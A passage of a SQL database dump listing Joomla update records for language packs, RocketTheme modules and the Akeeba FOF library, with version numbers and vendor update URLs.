CA','','pkg_fr-CA','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/fr-CA_details.xml','',''),(65,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.2.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(66,57,0,'Sinhala','','pkg_si-LK','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/si-LK_details.xml','',''),(67,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.2','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(68,57,0,'Turkmen','','pkg_tk-TM','package','',0,'3.5.0.2','','https://update.joomla.org/language/details3/tk-TM_details.xml','',''),(69,57,0,'Irish','','pkg_ga-IE','package','',0,'3.8.13.1','','https://update.joomla.org/language/details3/ga-IE_details.xml','',''),(70,57,0,'Dzongkha','','pkg_dz-BT','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/dz-BT_details.xml','',''),(71,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(72,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.4.2','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(73,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(74,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(75,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(76,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(77,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(78,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.4.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(81,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3004',''),(83,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(84,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.26','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(85,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.7','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(86,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.44','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(87,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.7','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(88,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.18','0802','http://updates.rockettheme.com/joomla/287/cb577720','',''),(89,20,0,'RokAjaxSearch Module','','mod_rokajaxsearch','module','',0,'2.0.6','0802','http://updates.rockettheme.com/joomla/290/1d5a0af1','',''),(90,20,0,'RokWeather Module','','mod_rokweather','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/292/a0cbba72','',''),(91,20,0,'RokStock Module','','mod_rokstock','module','',0,'2.0.3','0802','http://updates.rockettheme.com/joomla/295/87c1121c','',''),(92,20,0,'RokMiniEvents3 Module','','mod_rokminievents3','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/297/1686051690','',''),(93,20,0,'RokQuickCart Extension','','com_rokquickcart','component','',1,'2.1.5','0802','http://updates.rockettheme.com/joomla/298/ddfa10eb','',''),(94,20,0,'RokNavMenu Module','','mod_roknavmenu','module','',0,'2.0.9','0802','http://updates.rockettheme.com/joomla/300/5a9aa468','',''),(95,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.15','0802','http://updates.rockettheme.com/joomla/301/dfc993d8','',''),(96,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.3','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(97,20,0,'RokComments Plugin','','rokcomments','plugin','content',0,'2.0.3','0802','http://updates.rockettheme.com/joomla/303/d1fd7b76','',''),(98,20,0,'RokStories Module','','mod_rokstories','module','',0,'1.15','0802','http://updates.rockettheme.com/joomla/313/1724592219','',''),(99,20,0,'RokFeatureTable Module','','mod_rokfeaturetable','module','',0,'1.7','0802','http://updates.rockettheme.com/joomla/313/1929450724','',''),(100,20,0,'RokTabs Module','','mod_roktabs','module','',0,'1.14','0802','http://updates.rockettheme.com/joomla/313/1338024578','',''),(101,20,0,'RokNewsPager Module','','mod_roknewspager','module','',0,'2.0.2','0802','http://updates.rockettheme.com/joomla/313/632659459','',''),(102,20,0,'RokNewsFlash Module','','mod_roknewsflash','module','',0,'2.0.1','0802','http://updates.rockettheme.com/joomla/313/902599661','',''),(103,20,0,'RokContentRotator Module','','mod_rokcontentrotator','module','',0,'2.0.2','0802','http://updates.rockettheme.com/joomla/313/483184226','',''),(104,20,0,'RokIntroScroller Module','','mod_rokintroscroller','module','',0,'1.1','0802','http://updates.rockettheme.com/joomla/313/1559131823','',''),(105,20,0,'RokStock','','','module','',0,'2.0.3','0802','http://updates.rockettheme.com/joomla/313/983093075','',''),(106,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(107,20,0,'RokQuickCart','','','component','',0,'2.1.5','0802','http://updates.rockettheme.com/joomla/313/1089655497','',''),(108,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(109,20,0,'RokComments','','','plugin','',0,'2.0.3','0802','http://updates.rockettheme.com/joomla/313/2049982768','',''),(110,20,0,'RokCheck (Template Version Check)','','','module','',1,'1.0.0','0802','http://updates.rockettheme.com/joomla/381/791616223','',''),(111,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.7','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(112,20,0,'RokSocialButtons Plugin','','roksocialbuttons','plugin','content',0,'1.5.3','0802','http://updates.rockettheme.com/joomla/381/269989291','',''),(113,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.7','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(114,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(115,3,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(116,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(117,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(118,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(119,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(120,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(121,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(122,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(123,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(124,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(125,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(126,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(127,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(128,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(129,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(130,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(131,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(132,57,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(133,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(134,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(135,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(136,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(137,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(138,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(139,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(140,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(141,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(142,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(143,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(144,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(145,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(148,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(149,57,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(150,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(151,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(152,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(153,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(154,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(155,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(156,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(157,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(158,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(159,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(160,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(161,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(162,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(163,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(164,3,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(165,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(166,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(167,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(168,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(169,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(170,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(171,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(172,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(173,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(174,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(175,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(176,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(177,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(178,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(179,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(180,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(181,57,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(182,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(183,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(184,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(185,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(186,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(187,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(188,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(189,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(190,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(191,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(192,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(193,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(194,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(196,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(197,3,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(198,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(199,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(200,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(201,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(202,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(203,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(204,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(205,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(206,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(207,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(208,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(209,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(210,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(211,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(212,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(213,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(214,57,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(215,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(216,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(217,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(218,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(219,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(220,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(221,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(222,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(223,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(224,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(225,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(226,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(227,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(228,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(229,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(230,3,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(231,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(232,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(233,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(234,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(235,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(236,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(237,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(238,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(240,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(241,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(242,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(243,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(244,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(245,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(246,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(247,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(248,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(249,57,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(250,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(251,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(252,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(253,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(254,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(255,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(256,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(257,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(258,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(259,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(260,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(261,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(262,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(263,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(264,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(265,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(266,3,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(267,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(268,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(269,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(270,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(271,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(272,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(273,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(274,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(275,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(276,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(277,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(278,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(279,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(280,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(281,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(282,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(283,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(284,57,0,'French','','pkg_fr-FR','package','',0,'3.9.5.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(285,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(286,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(287,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(288,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(289,57,0,'Chinese 